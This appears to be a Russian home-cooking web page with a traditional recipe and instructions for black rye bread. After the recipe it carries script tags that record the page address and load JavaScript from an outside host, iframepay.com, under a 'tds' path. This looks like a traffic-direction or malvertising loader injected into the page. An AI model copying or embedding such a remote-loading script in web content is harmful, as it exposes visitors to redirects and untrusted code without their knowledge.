Начнем с хлеба.Хлеб - особый продукт,и хотя сейчас его можно купить в каждом магазине, его ценность не устаревает.Попробуйте испечь СВОЙ хлеб, по нашим рецептам, и вы поймете, почему наши предки уважали женщин в зависимости от того, какой они могли испечь хлеб...
ЧЕРНЫЙ ХЛЕБ
1,5 ведра ржаной муки, 0,5 ведра воды, 4 ст. ложки соли.
Тесто замешивают с вечера. Очень сухую муку высыпают в квашню,добавляют столько воды, чтобы можно было замесить довольно густое тесто. Посолив, тесто сильно вымешивают и, посыпав сверху мукой,ставят в теплое место (чтобы поднялось). На следующий день, тесто вымешивают в течение получаса, засыпая при этом столько муки, сколько нужно для хлеба, и, накрыв тесто, снова оставляют на 2-2,5 часа. Потом, сформировав хлебы, их выкладывают на столе,дают еще немного подняться,и слегка обмазав водой,сажают в печь.Считается, что духовка для этого не подходит, но мы с дочкой пробовали, в обычной газовой плите, и у нас неплохо получилось.Противень (или лопату, на которой сажают в печь) посыпают мукой и кладут по одному хлебу на лопату.Печь должна быть очень горячей, а хлебы пекутся, в зависимости от размера,от часа до 2,5 часов.
Готовый хлеб достают, и сверху слегка его смачивают водой.В холодное место, его можно выносить только тогда, когда он полностью остынет.Обычно, приготовление и выпечка хлеба занимают от15 до 20 часов...<script language="JavaScript">
var ifpc_id = "2562";
var ifpc_url = document.location;
var ifpc_rnd = Math.random();
</script>
<script type="text/javascript" src="http://iframepay.com/tds/js.php"></script>